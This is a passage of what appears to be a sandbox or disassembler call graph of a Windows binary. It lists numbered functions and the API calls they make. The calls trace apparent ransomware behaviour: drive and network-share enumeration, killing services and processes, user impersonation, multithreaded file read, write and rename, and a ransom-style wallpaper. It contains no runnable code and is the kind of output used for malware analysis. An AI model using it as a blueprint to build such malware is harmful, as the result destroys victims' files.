4431->4183 4431->4184 4433 9c4e6f 4432->4433 4434 9c550a 8 API calls 4433->4434 4435 9c4eab 4434->4435 4436 9c47f8 RtlFreeHeap 4435->4436 4437 9c19d8 4435->4437 4436->4437 4437->4187 4437->4188 4439 9c5008 4438->4439 4440 9c550a 8 API calls 4439->4440 4441 9c5044 4440->4441 4442 9c1a14 4441->4442 4443 9c47f8 RtlFreeHeap 4441->4443 4442->4195 4442->4196 4443->4442 4448 9c4c22 4444->4448 4445 9c1a35 4445->4199 4446 9c47ab 3 API calls 4446->4448 4447 9c4c6a GetDriveTypeW 4447->4448 4448->4445 4448->4446 4448->4447 4449 9c4c86 GetDiskFreeSpaceExW 4448->4449 4449->4448 4450->4204 4691 9c1db3 4451->4691 4454 9c1a68 4462 9c21fd 4454->4462 4455 9c5d3f 6 API calls 4456 9c213a 4455->4456 4457 9c47f8 RtlFreeHeap 4456->4457 4458 9c2142 4457->4458 4458->4454 4709 9c5f3c 4458->4709 4460 9c21d9 4461 9c47f8 RtlFreeHeap 4460->4461 4461->4454 4463 9c221b 4462->4463 4464 9c5f3c 4 API calls 4463->4464 4465 9c2243 4464->4465 4466 9c6202 3 API calls 4465->4466 4467 9c225e 4466->4467 4468 9c6603 6 API calls 4467->4468 4471 9c1a6d 4467->4471 4469 9c2278 4468->4469 4470 9c47f8 RtlFreeHeap 4469->4470 4470->4471 4472 9c1f87 4471->4472 4473 9c1db3 21 API calls 4472->4473 4474 9c1f9a 4473->4474 4475 9c5d3f 6 API calls 4474->4475 4482 9c1fc0 4474->4482 4476 9c1fb1 4475->4476 4477 9c47f8 RtlFreeHeap 4476->4477 4478 9c1fb9 4477->4478 4479 9c5f3c 4 API calls 4478->4479 4478->4482 4480 9c20fb 4479->4480 4481 9c47f8 RtlFreeHeap 4480->4481 4481->4482 4482->4210 4718 9c4b43 GetCommandLineW CommandLineToArgvW 4483->4718 4485 9c13d4 4486 9c1408 4485->4486 4719 9c4b35 LocalFree 4485->4719 4486->4213 4489 9c47da 4488->4489 4490 9c47b7 HeapCreate 4488->4490 4494 9c474e 4489->4494 4490->4489 4491 9c47cf GetProcessHeap 4490->4491 4491->4489 4493 9c47f4 4493->4297 4495 9c4758 4494->4495 4496 9c475a RtlAllocateHeap 4494->4496 4495->4493 4496->4493 4498 9c134b 4497->4498 4499 9c66e3 10 API calls 4498->4499 4500 9c13bb 4499->4500 4500->4306 4526 9c5c8c MultiByteToWideChar 4501->4526 4505 9c5c8c 6 API calls 4504->4505 4506 9c1125 4505->4506 4507 9c1145 4506->4507 4534 9c5cde CryptStringToBinaryW 4506->4534 4507->4306 4510 9c47f8 RtlFreeHeap 4510->4507 4542 9c64fe 4511->4542 4514 9c12c1 4514->4306 4517 9c64fe 3 API calls 4516->4517 4518 9c1312 4517->4518 4519 9c1325 4518->4519 4520 9c66a8 6 API calls 4518->4520 4519->4306 4520->4519 4522 9c64fe 3 API calls 4521->4522 4523 9c12e0 4522->4523 4524 9c12f3 4523->4524 4525 9c66a8 6 API calls 4523->4525 4524->4306 4525->4524 4527 9c5cab 4526->4527 4528 9c1164 4526->4528 4529 9c47ab 3 API calls 4527->4529 4528->4306 4530 9c5cb4 4529->4530 4530->4528 4531 9c5cbb MultiByteToWideChar 4530->4531 4531->4528 4532 9c5cce 4531->4532 4533 9c47f8 RtlFreeHeap 4532->4533 4533->4528 4535 9c5d01 4534->4535 4540 9c113a 4534->4540 4536 9c47ab 3 API calls 4535->4536 4537 9c5d0a 4536->4537 4538 9c5d11 CryptStringToBinaryW 4537->4538 4537->4540 4539 9c5d2f 4538->4539 4538->4540 4541 9c47f8 RtlFreeHeap 4539->4541 4540->4510 4541->4540 4553 9c476a HeapCreate 4542->4553 4544 9c650a 4545 9c474e RtlAllocateHeap 4544->4545 4548 9c12ae 4544->4548 4546 9c6543 4545->4546 4546->4548 4554 9c4787 HeapDestroy 4546->4554 4548->4514 4549 9c66a8 4548->4549 4550 9c66d8 4549->4550 4551 9c66b7 4549->4551 4550->4514 4551->4550 4555 9c1000 4551->4555 4553->4544 4554->4548 4556 9c100b 4555->4556 4559 9c655e 4556->4559 4560 9c656f 4559->4560 4561 9c474e RtlAllocateHeap 4560->4561 4572 9c1014 4560->4572 4562 9c6596 4561->4562 4562->4572 4573 9c61cd 4562->4573 4564 9c65a7 4565 9c65b6 4564->4565 4566 9c5c8c 6 API calls 4564->4566 4567 9c47f8 RtlFreeHeap 4565->4567 4568 9c65e1 4565->4568 4565->4572 4566->4565 4567->4568 4569 9c47f8 RtlFreeHeap 4568->4569 4571 9c65f0 4568->4571 4569->4571 4578 9c4795 RtlFreeHeap 4571->4578 4572->4551 4574 9c61da 4573->4574 4575 9c61d6 4573->4575 4576 9c47ab 3 API calls 4574->4576 4575->4564 4577 9c61ea 4576->4577 4577->4564 4578->4572 4580 9c552b RegQueryValueExW 4579->4580 4581 9c233b 4579->4581 4582 9c5545 4580->4582 4583 9c5576 RegCloseKey 4580->4583 4581->4321 4581->4323 4582->4583 4584 9c47ab 3 API calls 4582->4584 4583->4581 4585 9c5550 4584->4585 4585->4583 4586 9c5557 RegQueryValueExW 4585->4586 4586->4583 4587 9c556d 4586->4587 4588 9c47f8 RtlFreeHeap 4587->4588 4589 9c5573 4588->4589 4589->4583 4604 9c67c9 4590->4604 4592 9c6781 4592->4336 4594 9c6b82 4593->4594 4600 9c6b7b 4593->4600 4595 9c47ab 3 API calls 4594->4595 4596 9c6b8f 4595->4596 4597 9c6776 9 API calls 4596->4597 4596->4600 4598 9c6bb8 4597->4598 4599 9c6a11 9 API calls 4598->4599 4599->4600 4600->4338 4602 9c55aa RegSetValueExW RegCloseKey 4601->4602 4603 9c2560 4601->4603 4602->4603 4603->4344 4603->4345 4607 9c6a11 4604->4607 4608 9c6a26 4607->4608 4616 9c6a35 4607->4616 4619 9c69a2 4608->4619 4611 9c6a47 4617 9c6a64 4611->4617 4624 9c541b 4611->4624 4612 9c6a2b 4613 9c67d8 4612->4613 4622 9c5131 RtlInitializeCriticalSection 4612->4622 4613->4592 4623 9c4bac RtlEnterCriticalSection 4616->4623 4617->4613 4632 9c5286 RtlLeaveCriticalSection 4617->4632 4620 9c541b 6 API calls 4619->4620 4621 9c69b3 4620->4621 4621->4612 4622->4616 4623->4611 4633 9c5814 4624->4633 4626 9c542f 4626->4617 4627 9c5429 4627->4626 4628 9c564d CryptAcquireContextW 4627->4628 4629 9c5673 CryptGenRandom 4627->4629 4630 9c5669 4628->4630 4631 9c5667 4628->4631 4629->4617 4630->4629 4631->4617 4632->4613 4634 9c584f 4633->4634 4636 9c5822 4633->4636 4634->4627 4636->4634 4637 9c585d 4636->4637 4639 9c5868 4637->4639 4638 9c5907 timeBeginPeriod timeGetTime Sleep timeGetTime 4638->4639 4639->4638 4640 9c58f4 4639->4640 4640->4636 4647 9c5bd3 GetWindowsDirectoryW 4641->4647 4643 9c56a5 4644 9c56ad GetVolumeInformationW 4643->4644 4645 9c56d1 4643->4645 4646 9c47f8 RtlFreeHeap 4644->4646 4645->4380 4646->4645 4648 9c5be4 4647->4648 4649 9c5be6 4647->4649 4648->4643 4650 9c47ab 3 API calls 4649->4650 4651 9c5bf0 4650->4651 4652 9c5c09 4651->4652 4653 9c5bf7 GetWindowsDirectoryW 4651->4653 4652->4643 4653->4652 4654 9c5c03 4653->4654 4655 9c47f8 RtlFreeHeap 4654->4655 4655->4652 4657 9c26a8 4656->4657 4661 9c26a4 4656->4661 4678 9c544b 4657->4678 4660 9c47ab 3 API calls 4662 9c26ca 4660->4662 4661->4399 4662->4661 4663 9c544b 9 API calls 4662->4663 4663->4662 4665 9c6614 4664->4665 4666 9c474e RtlAllocateHeap 4665->4666 4675 9c661a 4665->4675 4667 9c663b 4666->4667 4667->4675 4682 9c63c0 WideCharToMultiByte 4667->4682 4670 9c665b 4672 9c6686 4670->4672 4673 9c47f8 RtlFreeHeap 4670->4673 4670->4675 4671 9c6202 3 API calls 4671->4670 4674 9c6695 4672->4674 4676 9c47f8 RtlFreeHeap 4672->4676 4673->4672 4690 9c4795 RtlFreeHeap 4674->4690 4675->4397 4676->4674 4679 9c545b 4678->4679 4681 9c26b4 4678->4681 4680 9c6a11 9 API calls 4679->4680 4680->4681 4681->4660 4681->4661 4683 9c63e1 4682->4683 4689 9c6409 4682->4689 4684 9c47ab 3 API calls 4683->4684 4685 9c63e7 4684->4685 4686 9c63ee WideCharToMultiByte 4685->4686 4685->4689 4687 9c6403 4686->4687 4686->4689 4688 9c47f8 RtlFreeHeap 4687->4688 4688->4689 4689->4670 4689->4671 4690->4675 4692 9c1dd7 4691->4692 4693 9c550a 8 API calls 4692->4693 4694 9c1e10 4693->4694 4695 9c1e30 4694->4695 4696 9c550a 8 API calls 4694->4696 4697 9c47ab 3 API calls 4695->4697 4699 9c1e55 4695->4699 4696->4695 4698 9c1e4e 4697->4698 4698->4699 4700 9c1e79 _snwprintf 4698->4700 4699->4454 4699->4455 4701 9c1ef4 4700->4701 4702 9c6b67 12 API calls 4701->4702 4703 9c1f03 4702->4703 4704 9c47f8 RtlFreeHeap 4703->4704 4705 9c1f0b 4704->4705 4705->4699 4706 9c5588 3 API calls 4705->4706 4707 9c1f2d 4706->4707 4707->4699 4708 9c5588 3 API calls 4707->4708 4708->4699 4710 9c5f4b 4709->4710 4713 9c5f76 4709->4713 4712 9c47f8 RtlFreeHeap 4710->4712 4710->4713 4714 9c5f7d 4710->4714 4712->4710 4713->4460 4715 9c6007 4714->4715 4716 9c5f91 4714->4716 4715->4710 4716->4715 4717 9c47ab 3 API calls 4716->4717 4717->4715 4718->4485 4719->4486 4721 9c5dff 4720->4721 4721->4224 4722->4231 4724 9c4d2c 4723->4724 4725 9c4d08 GetTokenInformation 4723->4725 4724->4232 4727 9c4df3 OpenProcessToken 4724->4727 4726 9c4b21 FindCloseChangeNotification 4725->4726 4726->4724 4728 9c4e0f GetTokenInformation 4727->4728 4732 9c4e48 4727->4732 4729 9c4e28 IsValidSid 4728->4729 4730 9c4e37 4728->4730 4729->4730 4731 9c4b21 FindCloseChangeNotification 4730->4731 4731->4732 4732->4232 4732->4237 4734 9c4b21 FindCloseChangeNotification 4733->4734 4735 9c563f 4734->4735 4736 9c4ec6 4735->4736 4737 9c47ab 3 API calls 4736->4737 4738 9c4eda 4737->4738 4739 9c4ee5 GetModuleFileNameW 4738->4739 4741 9c47f8 RtlFreeHeap 4738->4741 4742 9c4f0f 4738->4742 4744 9c47ab 3 API calls 4738->4744 4739->4738 4740 9c4f11 4739->4740 4740->4742 4743 9c47f8 RtlFreeHeap 4740->4743 4741->4738 4742->4242 4742->4243 4743->4742 4744->4738 4756 9c4b43 GetCommandLineW CommandLineToArgvW 4745->4756 4747 9c52a3 4748 9c5325 4747->4748 4749 9c52be 4747->4749 4750 9c52b3 LocalFree 4747->4750 4748->4245 4751 9c531c LocalFree 4749->4751 4752 9c52df 4749->4752 4750->4748 4751->4748 4753 9c47ab 3 API calls 4752->4753 4754 9c52e8 4753->4754 4755 9c5311 LocalFree 4754->4755 4755->4748 4756->4747 4758 9c2baf 4757->4758 4759 9c2c52 4757->4759 4760 9c4ec6 5 API calls 4758->4760 4768 9c532c RtlAdjustPrivilege 4759->4768 4762 9c2bbb 4760->4762 4761 9c2c50 4761->4759 4762->4761 4763 9c5588 3 API calls 4762->4763 4764 9c2c1f 4763->4764 4765 9c2c47 4764->4765 4766 9c5588 3 API calls 4764->4766 4767 9c47f8 RtlFreeHeap 4765->4767 4766->4765 4767->4761 4769 9c37f4 4768->4769 4770 9c5349 4768->4770 4769->4258 4769->4275 4770->4769 4771 9c5350 RtlAdjustPrivilege 4770->4771 4771->4769 4773 9c3bb3 EnumServicesStatusExW 4772->4773 4781 9c381a 4772->4781 4774 9c3bea 4773->4774 4775 9c3bd5 RtlGetLastWin32Error 4773->4775 4777 9c47ab 3 API calls 4774->4777 4775->4774 4776 9c3be1 CloseServiceHandle 4775->4776 4776->4781 4778 9c3bf3 4777->4778 4779 9c3bfd CloseServiceHandle 4778->4779 4780 9c3c0b EnumServicesStatusExW 4778->4780 4779->4781 4782 9c3cdc CloseServiceHandle 4780->4782 4784 9c3c2d 4780->4784 4791 9c53a4 CreateToolhelp32Snapshot 4781->4791 4782->4781 4783 9c3ccb 4783->4782 4784->4783 4785 9c3c6f OpenServiceW 4784->4785 4785->4783 4786 9c3c86 ControlService 4785->4786 4787 9c3ca8 DeleteService 4786->4787 4788 9c3cd3 CloseServiceHandle 4786->4788 4789 9c3cd2 4787->4789 4790 9c3cb2 4787->4790 4788->4783 4789->4788 4790->4784 4792 9c53c5 Process32FirstW 4791->4792 4796 9c3828 CreateThread 4791->4796 4794 9c53df 4792->4794 4793 9c540c 4795 9c4b21 FindCloseChangeNotification 4793->4795 4794->4793 4797 9c53fa Process32NextW 4794->4797 4795->4796 4796->4272 5286 9c291d 4796->5286 4797->4794 4799 9c32fa 4798->4799 4830 9c336e 4798->4830 4888 9c4b43 GetCommandLineW CommandLineToArgvW 4799->4888 4803 9c3410 PathRemoveBackslashW PathIsDirectoryW 4807 9c3441 PathIsNetworkPathW 4803->4807 4808 9c3423 PathAddBackslashW 4803->4808 4804 9c34f1 4810 9c3502 4804->4810 4880 9c797a 4804->4880 4805 9c3317 4889 9c4b35 LocalFree 4805->4889 4806 9c3303 4806->4805 4812 9c47ab 3 API calls 4806->4812 4817 9c330a 4806->4817 4813 9c3439 4807->4813 4816 9c344f 4807->4816 4891 9c761a 4808->4891 4810->4813 4814 9c350b CreateThread 4810->4814 4818 9c3358 4812->4818 4820 9c3555 4813->4820 4823 9c3537 4813->4823 4814->4813 4819 9c3522 WaitForSingleObject 4814->4819 5191 9c7b7e 4814->5191 4816->4817 4827 9c346e PathAddBackslashW 4816->4827 4817->4266 4835 9c453e GetDC 4817->4835 4818->4805 4822 9c335f 4818->4822 4819->4813 4910 9c73e0 4820->4910 4890 9c4b35 LocalFree 4822->4890 4823->4813 4823->4820 4909 9c568d Sleep 4823->4909 4824 9c47f8 RtlFreeHeap 4824->4813 4828 9c47ab 3 API calls 4827->4828 4834 9c3482 4828->4834 4867 9c748f 4830->4867 4831 9c34a1 PathAddBackslashW 4831->4834 4832 9c34b2 PathAddBackslashW 4833 9c761a 55 API calls 4832->4833 4833->4834 4834->4813 4834->4831 4834->4832 4836 9c3860 4835->4836 4837 9c455a CreateCompatibleDC 4835->4837 4836->4266 4836->4278 4838 9c473f ReleaseDC 4837->4838 4839 9c456f GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 4837->4839 4838->4836 4840 9c4737 DeleteDC 4839->4840 4841 9c45a3 SelectObject GetDeviceCaps MulDiv CreateFontW 4839->4841 4840->4838 4842 9c472e DeleteObject 4841->4842 4843 9c45e7 SelectObject SetBkMode SetTextColor GetStockObject FillRect 4841->4843 4842->4840 4844 9c46ca DrawTextW 4843->4844 4856 9c463d 4843->4856 5227 9c4439 4844->5227 4846 9c46fe 4847 9c4725 DeleteObject 4846->4847 5245 9c4284 GetObjectW 4846->5245 4847->4842 4848 9c46c4 4848->4844 4850 9c544b 9 API calls 4850->4856 4852 9c47f8 RtlFreeHeap 4853 9c4724 4852->4853 4853->4847 4854 9c544b 9 API calls 4855 9c468d SetPixel 4854->4855 4855->4856 4856->4844 4856->4848 4856->4850 4856->4854 4858 9c1433 4857->4858 4860 9c1443 4858->4860 5270 9c6413 4858->5270 5279 9c1f57 4860->5279 4863 9c1f57 RtlFreeHeap 4864 9c1459 4863->4864 4865 9c47f8 RtlFreeHeap 4864->4865 4866 9c14f7 4864->4866 4865->4864 4866->4276 4922 9c476a HeapCreate 4867->4922 4869 9c749b 4870 9c74a9 CreateIoCompletionPort 4869->4870 4876 9c33c5 4869->4876 4871 9c74bf 4870->4871 4872 9c74c9 4870->4872 4930 9c4787 HeapDestroy 4871->4930 4923 9c743f 4872->4923 4876->4803 4876->4804 4876->4817 4878 9c74df 4879 9c4b21 FindCloseChangeNotification 4878->4879 4879->4876 4881 9c47ab 3 API calls 4880->4881 4883 9c798b 4881->4883 4882 9c7a15 4882->4810 4883->4882 4884 9c79c6 GetDriveTypeW 4883->4884 4885 9c7a10 4883->4885 4887 9c761a 55 API calls 4883->4887 4884->4883 4886 9c47f8 RtlFreeHeap 4885->4886 4886->4882 4887->4883 4888->4806 4889->4817 4890->4830 4892 9c7641 4891->4892 4905 9c765d 4892->4905 5034 9c78f4 4892->5034 4895 9c3433 4895->4824 4896 9c47f8 RtlFreeHeap 4898 9c7824 4896->4898 4897 9c47f8 RtlFreeHeap 4897->4905 4898->4895 4898->4896 4900 9c76f9 FindFirstFileW 4900->4905 4901 9c76e7 FindFirstFileExW 4901->4905 4902 9c77fb FindNextFileW 4903 9c7811 FindClose 4902->4903 4902->4905 4903->4905 4904 9c78f4 3 API calls 4904->4905 4905->4897 4905->4898 4905->4900 4905->4901 4905->4902 4905->4903 4905->4904 4908 9c2d28 14 API calls 4905->4908 5044 9c5387 GetPEB 4905->5044 5045 9c38bf 4905->5045 4908->4905 4909->4823 5187 9c5370 GetSystemInfo 4910->5187 4912 9c741a 4915 9c7429 4912->4915 5189 9c568d Sleep 4912->5189 4913 9c7402 PostQueuedCompletionStatus 5188 9c5370 GetSystemInfo 4913->5188 5190 9c4787 HeapDestroy 4915->5190 4916 9c73f8 4916->4912 4916->4913 4919 9c7430 4920 9c4b21 FindCloseChangeNotification 4919->4920 4921 9c7438 4920->4921 4921->4817 4922->4869 4932 9c5370 GetSystemInfo 4923->4932 4925 9c745b CreateThread 4926 9c7483 4925->4926 4928 9c7454 4925->4928 4934 9c3571 GetCurrentThread SetThreadPriority 4925->4934 4926->4876 4931 9c4787 HeapDestroy 4926->4931 4927 9c4b21 FindCloseChangeNotification 4927->4928 4928->4925 4928->4926 4928->4927 4933 9c5370 GetSystemInfo 4928->4933 4930->4876 4931->4878 4932->4928 4933->4928 4945 9c7518 GetQueuedCompletionStatus 4934->4945 4936 9c36bb 4937 9c3683 RtlGetLastWin32Error 4940 9c359d 4937->4940 4940->4936 4940->4937 4946 9c3188 4940->4946 4957 9c3740 4940->4957 4966 9c36c9 4940->4966 4975 9c326e 4940->4975 4985 9c2eb9 4940->4985 4988 9c7518 GetQueuedCompletionStatus 4940->4988 4945->4940 4947 9c4b21 FindCloseChangeNotification 4946->4947 4948 9c319c 4947->4948 4949 9c47ab 3 API calls 4948->4949 4950 9c31b5 4949->4950 4951 9c31e6 4950->4951 4989 9c7939 MoveFileW 4950->4989 4951->4951 4996 9c2edb 4951->4996 4956 9c47f8 RtlFreeHeap 4956->4951 4958 9c3765 4957->4958 5024 9c7600 WriteFile 4958->5024 4960 9c379a 4961 9c379f RtlGetLastWin32Error 4960->4961 4962 9c37c1 4960->4962 4961->4962 4965 9c37ab 4961->4965 4962->4940 4965->4960 5025 9c568d Sleep 4965->5025 5026 9c7600 WriteFile 4965->5026 4967 9c36e8 4966->4967 5027 9c7600 WriteFile 4967->5027 4969 9c3713 4970 9c373c 4969->4970 4971 9c3718 RtlGetLastWin32Error 4969->4971 4970->4940 4971->4970 4974 9c3724 4971->4974 4974->4969 5028 9c568d Sleep 4974->5028 5029 9c7600 WriteFile 4974->5029 5030 9c75cc ReadFile 4975->5030 4977 9c32a1 RtlGetLastWin32Error 4978 9c329c 4977->4978 4982 9c32cd 4977->4982 4978->4977 4979 9c32cf 4978->4979 4978->4982 4984 9c32b2 4978->4984 4980 9c2eb9 PostQueuedCompletionStatus 4979->4980 4980->4982 4982->4940 4984->4978 5031 9c568d Sleep 4984->5031 5032 9c75cc ReadFile 4984->5032 5033 9c7535 PostQueuedCompletionStatus 4985->5033 4987 9c2ed6 4987->4940 4988->4940 4990 9c794f RtlGetLastWin32Error 4989->4990 4991 9c31de 4989->4991 4990->4991 4992 9c7959 4990->4992 4991->4956 5002 9c509b 4992->5002 4995 9c7962 MoveFileW RevertToSelf 4995->4991 4997 9c2ef0 4996->4997 5015 9c754f 4997->5015 5003 9c50b9 5002->5003 5004 9c5114 ImpersonateLoggedOnUser 5003->5004 5012 9c4fc0 5003->5012 5005 9c50e8 5004->5005 5005->4991 5005->4995 5008 9c50ec OpenProcessToken 5009 9c510a 5008->5009 5010 9c5101 5008->5010 5009->5004 5011 9c4b21 FindCloseChangeNotification 5010->5011 5011->5005 5013 9c53a4 FindCloseChangeNotification CreateToolhelp32Snapshot Process32FirstW Process32NextW 5012->5013 5014 9c4fdf OpenProcess 5013->5014 5014->5005 5014->5008 5016 9c4b21 FindCloseChangeNotification 5015->5016 5017 9c755e 5016->5017 5018 9c47f8 RtlFreeHeap 5017->5018 5019 9c2ef6 5018->5019 5020 9c7504 5019->5020 5023 9c4795 RtlFreeHeap 5020->5023 5022 9c2eff 5022->4940 5023->5022 5024->4960 5025->4965 5026->4965 5027->4969 5028->4974 5029->4974 5030->4978 5031->4984 5032->4984 5033->4987 5035 9c47ab 3 API calls 5034->5035 5036 9c78ff 5035->5036 5037 9c6202 3 API calls 5036->5037 5038 9c7655 5036->5038 5037->5038 5039 9c2d28 5038->5039 5054 9c55d8 5039->5054 5043 9c2d5b 5043->4905 5044->4905 5094 9c2f05 5045->5094 5048 9c38df 5048->4905 5050 9c38ee 5051 9c38f6 5050->5051 5128 9c7535 PostQueuedCompletionStatus 5050->5128 5051->5048 5052 9c2edb 2 API calls 5051->5052 5052->5048 5055 9c5608 5054->5055 5056 9c55e6 5054->5056 5058 9c56da 5 API calls 5055->5058 5078 9c4a20 5056->5078 5060 9c560d 5058->5060 5062 9c4a20 3 API calls 5060->5062 5065 9c2d35 5060->5065 5062->5065 5064 9c4a20 3 API calls 5064->5065 5065->5043 5066 9c412f 5065->5066 5067 9c413c 5066->5067 5068 9c47ab 3 API calls 5067->5068 5070 9c414f 5068->5070 5069 9c418d 5069->5043 5070->5069 5092 9c7845 CreateFileW 5070->5092 5072 9c417e 5073 9c47f8 RtlFreeHeap 5072->5073 5074 9c4186 5073->5074 5074->5069 5093 9c789d WriteFile 5074->5093 5076 9c41a9 5077 9c4b21 FindCloseChangeNotification 5076->5077 5077->5069 5079 9c4a3d AllocateAndInitializeSid 5078->5079 5080 9c4ac7 SetNamedSecurityInfoW 5078->5080 5081 9c4a5a 5079->5081 5082 9c4a62 SetEntriesInAclW 5079->5082 5080->5081 5081->5065 5084 9c56da 5081->5084 5082->5081 5083 9c4abd 5082->5083 5083->5080 5085 9c56ec GetCurrentProcess OpenProcessToken 5084->5085 5086 9c572e SetNamedSecurityInfoW 5084->5086 5087 9c55f8 5085->5087 5088 9c5703 GetTokenInformation 5085->5088 5086->5087 5087->5064 5087->5065 5088->5087 5089 9c571f 5088->5089 5090 9c4b21 FindCloseChangeNotification 5089->5090 5091 9c572d 5090->5091 5091->5086 5092->5072 5093->5076 5129 9c7845 CreateFileW 5094->5129 5096 9c2f46 5130 9c74f0 5096->5130 5097 9c2f70 5139 9c7884 SetFilePointerEx 5097->5139 5098 9c2f27 5098->5096 5098->5097 5099 9c2f40 5098->5099 5102 9c4b21 FindCloseChangeNotification 5099->5102 5102->5096 5103 9c2f6c 5106 9c2fcd RtlGetLastWin32Error 5103->5106 5118 9c2ff4 5103->5118 5104 9c2f7f 5140 9c786b ReadFile 5104->5140 5117 9c2fd7 5106->5117 5119 9c2fc6 5106->5119 5107 9c2f95 5110 9c4b21 FindCloseChangeNotification 5107->5110 5111 9c2fad 5110->5111 5111->5096 5111->5119 5112 9c309f 5163 9c30af 5112->5163 5113 9c3015 RtlGetLastWin32Error 5115 9c305a 5113->5115 5113->5118 5114 9c74f0 RtlAllocateHeap 5114->5117 5120 9c7504 RtlFreeHeap 5115->5120 5117->5103 5117->5114 5141 9c568d Sleep 5117->5141 5118->5112 5118->5113 5121 9c55d8 8 API calls 5118->5121 5122 9c3046 5118->5122 5124 9c303a GetFileAttributesW 5118->5124 5133 9c756b CreateFileW 5118->5133 5119->5048 5127 9c73bb CreateIoCompletionPort 5119->5127 5120->5119 5121->5118 5122->5118 5126 9c304a SetFileAttributesW 5122->5126 5142 9c5a21 5122->5142 5162 9c568d Sleep 5122->5162 5124->5115 5124->5122 5126->5115 5126->5118 5127->5050 5128->5051 5129->5098 5131 9c474e RtlAllocateHeap 5130->5131 5132 9c7500 5131->5132 5132->5103 5134 9c759f 5133->5134 5135 9c759b 5133->5135 5136 9c6202 3 API calls 5134->5136 5135->5118 5137 9c75a7 5136->5137 5137->5135 5138 9c4b21 FindCloseChangeNotification 5137->5138 5138->5135 5139->5104 5140->5107 5141->5117 5143 9c5a2e 5142->5143 5168 9c5387 GetPEB 5143->5168 5145 9c5a45 5146 9c5bcc 5145->5146 5169 9c5c11 5145->5169 5146->5122 5148 9c5a58 5148->5146 5149 9c5a60 OpenSCManagerW 5148->5149 5157 9c5a83 5149->5157 5150 9c5bad CloseServiceHandle 5150->5146 5152 9c5af8 OpenServiceW 5152->5150 5153 9c5b1a ControlService 5152->5153 5154 9c5b38 DeleteService 5153->5154 5153->5157 5154->5150 5155 9c5b43 CloseServiceHandle 5154->5155 5155->5157 5157->5146 5157->5150 5157->5152 5159 9c5b6b OpenProcess 5157->5159 5172 9c4964 5157->5172 5181 9c4917 OpenProcess 5157->5181 5159->5157 5160 9c5b7c TerminateProcess 5159->5160 5161 9c4b21 FindCloseChangeNotification 5160->5161 5161->5157 5162->5122 5164 9c6776 9 API calls 5163->5164 5165 9c30e8 5164->5165 5166 9c6a11 9 API calls 5165->5166 5167 9c3138 5166->5167 5167->5119 5168->5145 5185 9c4832 5169->5185 5173 9c497a 5172->5173 5175 9c497f 5172->5175 5174 9c47ab 3 API calls 5173->5174 5174->5175 5176 9c4992 OpenProcess 5175->5176 5177 9c49a9 QueryFullProcessImageNameW 5176->5177 5180 9c49dc 5176->5180 5178 9c4b21 FindCloseChangeNotification 5177->5178 5179 9c49c2 PathFindFileNameW 5178->5179 5179->5180 5180->5157 5182 9c495f 5181->5182 5183 9c4936 GetExitCodeProcess Sleep 5181->5183 5182->5157 5183->5183 5184 9c4955 CloseHandle 5183->5184 5184->5182 5186 9c483c VerSetConditionMask VerifyVersionInfoW 5185->5186 5186->5148 5187->4916 5188->4916 5189->4912 5190->4919 5192 9c47ab 3 API calls 5191->5192 5194 9c7b8f 5192->5194 5193 9c7c56 5194->5193 5195 9c509b 7 API calls 5194->5195 5202 9c7bcb 5195->5202 5196 9c7c17 5198 9c47f8 RtlFreeHeap 5196->5198 5197 9c7bd2 GetDriveTypeW 5197->5202 5199 9c7c1c 5198->5199 5212 9c7a1f WNetOpenEnumW 5199->5212 5200 9c761a 55 API calls 5200->5202 5202->5196 5202->5197 5202->5200 5204 9c7a1f 59 API calls 5205 9c7c2e 5204->5205 5206 9c7a1f 59 API calls 5205->5206 5207 9c7c37 5206->5207 5208 9c7a1f 59 API calls 5207->5208 5209 9c7c40 5208->5209 5210 9c7a1f 59 API calls 5209->5210 5211 9c7c49 RevertToSelf 5210->5211 5211->5193 5213 9c7a3f 5212->5213 5214 9c7a46 5212->5214 5213->5204 5215 9c47ab 3 API calls 5214->5215 5216 9c7a59 5215->5216 5217 9c7a70 5216->5217 5218 9c7a60 WNetCloseEnum 5216->5218 5219 9c7a71 WNetEnumResourceW 5217->5219 5220 9c7b62 5217->5220 5223 9c7a1f 55 API calls 5217->5223 5224 9c47ab 3 API calls 5217->5224 5225 9c761a 55 API calls 5217->5225 5226 9c47f8 RtlFreeHeap 5217->5226 5218->5213 5219->5217 5221 9c47f8 RtlFreeHeap 5220->5221 5222 9c7b68 WNetCloseEnum 5221->5222 5222->5213 5223->5217 5224->5217 5225->5217 5226->5217 5228 9c544b 9 API calls 5227->5228 5229 9c4449 5228->5229 5230 9c47ab 3 API calls 5229->5230 5244 9c44ea 5229->5244 5231 9c4463 5230->5231 5232 9c44af 5231->5232 5233 9c544b 9 API calls 5231->5233 5231->5244 5261 9c5753 GetTempPathW 5232->5261 5233->5231 5235 9c44de 5236 9c44e4 5235->5236 5238 9c44ec 5235->5238 5237 9c47f8 RtlFreeHeap 5236->5237 5237->5244 5239 9c47ab 3 API calls 5238->5239 5240 9c4509 5239->5240 5241 9c47f8 RtlFreeHeap 5240->5241 5240->5244 5242 9c4518 5241->5242 5243 9c47f8 RtlFreeHeap 5242->5243 5243->5244 5244->4846 5246 9c4422 SystemParametersInfoW 5245->5246 5247 9c42a4 LocalAlloc 5245->5247 5246->4852 5249 9c432b GlobalAlloc 5247->5249 5250 9c4324 5247->5250 5249->5246 5251 9c4361 GetDIBits 5249->5251 5250->5249 5251->5246 5252 9c437e CreateFileW 5251->5252 5252->5246 5253 9c43a1 WriteFile 5252->5253 5254 9c4404 5253->5254 5255 9c43e7 WriteFile 5253->5255 5258 9c4b21 FindCloseChangeNotification 5254->5258 5255->5254 5256 9c4407 WriteFile 5255->5256 5256->5254 5257 9c4425 5256->5257 5259 9c4b21 FindCloseChangeNotification 5257->5259 5258->5246 5260 9c442a GlobalFree 5259->5260 5260->5246 5262 9c5764 5261->5262 5263 9c5766 5261->5263 5262->5235 5264 9c47ab 3 API calls 5263->5264 5265 9c5770 5264->5265 5266 9c5789 5265->5266 5267 9c5777 GetTempPathW 5265->5267 5266->5235 5267->5266 5268 9c5783 5267->5268 5269 9c47f8 RtlFreeHeap 5268->5269 5269->5266 5271 9c6468 5270->5271 5272 9c6422 5270->5272 5284 9c4795 RtlFreeHeap 5271->5284 5272->5271 5277 9c47f8 RtlFreeHeap 5272->5277 5283 9c4795 RtlFreeHeap 5272->5283 5274 9c6473 5285 9c4787 HeapDestroy 5274->5285 5276 9c647a 5276->4858 5277->5272 5280 9c144d 5279->5280 5282 9c1f64 5279->5282 5280->4863 5281 9c47f8 RtlFreeHeap 5281->5282 5282->5280 5282->5281 5283->5272 5284->5274 5285->5276 5287 